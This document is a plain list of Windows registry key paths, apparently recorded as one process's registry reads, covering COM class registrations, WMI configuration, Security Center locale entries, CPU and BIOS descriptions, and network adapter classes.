HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit
HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\LocaleName
HKEY_PERFORMANCE_TEXT\Counter
HKEY_PERFORMANCE_DATA\238
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\InfPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\InfSection
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\InstalledDisplayDrivers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\HardwareInformation.MemorySize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\HardwareInformation.ChipType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\HardwareInformation.DACType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Adapters\{C2D43895-0262-4873-A789-C2F96D24B693}\IpConfig
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\Description
